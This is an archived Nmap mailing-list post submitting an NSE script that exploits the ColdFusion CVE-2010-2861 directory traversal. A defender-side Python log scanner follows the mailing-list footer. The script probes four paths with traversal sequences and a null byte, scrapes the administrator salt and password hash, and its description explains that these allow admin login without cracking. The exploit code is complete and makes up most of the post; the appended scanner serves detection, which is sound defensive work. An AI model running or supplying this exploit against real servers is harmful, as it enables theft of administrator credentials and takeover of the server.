Nmap Development mailing list archives

CVE-2010-2861 - NSE for ColdFusion locale Directory Traversal Submission


From: Micah <micah.hoffman () gmail com>
Date: Fri, 10 Feb 2012 16:34:53 -0500

First time poster here. I created an NSE for the CVE-2010-2861 ColdFusion
locale dir traversal. It takes an IP and port and will look (if it is
HTTP/HTTPS) for the 4 locations where the password.properties file could
be.  It'll return the salt and password hash both scraped from the response
page.

This is my first NSE attempt and I'm sure that the code can be optimized,
but it does work. There was 1 more step I wanted to take with this but
could not: to use this information you need to get the SHA1 HMAC by using
the salt (retrieved from the page) and the hash (also in the page). It is
this HMAC that authenticates you to the server. I couldn't find a way to
get this.

Wanted to submit it for inclusion in nmap's scripts but couldn't find a
submission form or anything. Hoping that posting it here gets it closer to
being included.

--- Micah



------------------------------------------------------

http-coldfusion-dir-traversal.nse

description = [[
This script will execute a directory traversal attack against a ColdFusion
server and try to grab the password hash for the administrator user. Using
this information and a little web proxying, you can log into the ColdFusion
server as the administrator without cracking the password hash.

For more information on this vulnerability see:
* http://www.blackhatacademy.org/security101/Cold_Fusion_Hacking
* http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2861
]]

---
-- @usage
-- nmap --script http-coldfusion-dir-traversal -p80,443 <target>
--
-- @output
-- 80/tcp open  http
-- | http-coldfusion-dir-traversal:
-- |    CFusionMX   -> SUCCESS - Salt: 1111111111111, Hash: AB3717200CD629BE34926297D9A0E87C7B0E7761
-- |    CFusionMX7  -> SUCCESS - Salt: 2222222222222, Hash: 0976A887B98C87E545D3A56F8F87D88E8E0A0980
-- |    ColdFusion8 -> SUCCESS - Salt: 3333333333333, Hash: A43A778B89C09D09E0F776A897F0976534356500
-- |_   JRun4\servers -> SUCCESS - Salt: 44444444444444, Hash: 0976A887B98C87E545D3A56F8F87D88E8E0A0980

author = "Micah Hoffman"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

-- "safe" and "intrusive" are mutually exclusive NSE categories; this script
-- sends exploit requests to the target, so it is intrusive.
categories = {"intrusive", "vuln"}

local http = require "http"
local shortport = require "shortport"
local string = require "string"

portrule = shortport.http

-- The four locations where password.properties may live, one per product
-- layout. The %00 is sent literally in the URL (the original wrote "\%00",
-- which is not a valid Lua escape sequence).
local PROBES = {
  { "CFusionMX  ",    '/CFIDE/administrator/enter.cfm?locale=..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX\\lib\\password.properties%00en' },
  { "CFusionMX7 ",    '/CFIDE/administrator/enter.cfm?locale=..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX7\\lib\\password.properties%00en' },
  { "ColdFusion8",    '/CFIDE/administrator/enter.cfm?locale=..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion8\\lib\\password.properties%00en' },
  { "JRun4\\servers", '/CFIDE/administrator/enter.cfm?locale=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\JRun4\\servers\\cfusion\\cfusion-ear\\cfusion-war\\WEB-INF\\cfusion\\lib\\password.properties%00en' },
}

action = function(host, port)

  -- Fetch one page and scrape the salt and password hash out of the response.
  local function grabAndGrep(page)
    local response = http.get(host, port, page)

    -- No response at all (connection failure, timeout)?
    if not response or not response.status then
      return "No response"
    end

    -- Anything other than a 200 with a body means the traversal did not work.
    if response.status ~= 200 then
      return "HTTP response code not 200"
    end
    if not response.body then
      return "Empty response body"
    end

    -- The salt is echoed in a hidden form field. Use a lazy match (.-) so we
    -- take the value= that follows "salt", not the last value= in the body.
    local salt = response.body:match("salt.-value=\"(%d+)")
    -- The hash is a run of uppercase hex digits after "password=". The original
    -- spelled out twenty [A-F0-9] classes because Lua patterns have no {n}.
    local hash = response.body:match("password=([A-F0-9]+)")

    -- Both the salt and the hash in one page means the exploit succeeded.
    if salt and hash then
      return string.format("SUCCESS - Salt: %s, Hash: %s", salt, hash)
    end
    return "Not vuln"
  end

  -- The original assigned a global final_out but declared local finalout;
  -- one local is used for both here.
  local final_out = ""
  for _, probe in ipairs(PROBES) do
    final_out = final_out .. "\n   " .. probe[1] .. " -> " .. grabAndGrep(probe[2])
  end

  return final_out
end
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
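A defender-side companion to the script in the post (added here; not part of Micah's submission or of Nmap): it scans Apache combined-format access logs for requests shaped like the four probes the script sends, that is, hits on enter.cfm whose locale value contains traversal sequences, a %00 byte, or password.properties. It goes a step beyond the post by also unwrapping double-percent-encoded variants; the log lines are constructed samples and the log format is an assumption.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-log samples (not from the original post): two traversal probes against enter.cfm (one single-, one double-percent-encoded) plus two benign requests.
SAMPLE_LOG = r"""
203.0.113.10 - - [10/Feb/2012:16:34:53 -0500] "GET /CFIDE/administrator/enter.cfm?locale=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cCFusionMX7%5clib%5cpassword.properties%00en HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Feb/2012:16:34:54 -0500] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Feb/2012:16:35:01 -0500] "GET /CFIDE/administrator/enter.cfm?locale=%2e%2e%2f%2e%2e%2fColdFusion8%2flib%2fpassword.properties%2500en HTTP/1.1" 500 312 "-" "curl/7.19"
192.0.2.5 - - [10/Feb/2012:16:36:12 -0500] "GET /index.cfm?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

def fully_decode(value, max_rounds=3):
    """Percent-decode until stable (bounded): %2500 -> %00 -> NUL byte."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def locale_indicators(target):
    """Indicators of a CVE-2010-2861 probe in one request target ([] when benign)."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/cfide/administrator/enter.cfm"):
        return []
    hits = []
    # parse_qs decodes once; fully_decode also unwraps double-encoded payloads.
    for raw in parse_qs(parts.query, keep_blank_values=True).get("locale", []):
        value = fully_decode(raw)
        normalized = value.replace("\\", "/").lower()
        if "../" in normalized:
            hits.append("traversal")  # ..\ or ../ climbing out of the locale directory
        if "\x00" in value:
            hits.append("nul_byte")  # the %00 the probes end with
        if "password.properties" in normalized:
            hits.append("password_properties")  # the file the script scrapes salt/hash from
    return hits

def scan_log(text):
    """One alert per request carrying an indicator; a 200 is what the NSE script counts as success."""
    alerts = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if m and (hits := locale_indicators(m["target"])):
            alerts.append({"ip": m["ip"], "status": int(m["status"]), "indicators": hits})
    return alerts
```

A 200 alongside all three indicators is the case to triage first, since that is exactly the response the script treats as a successful grab.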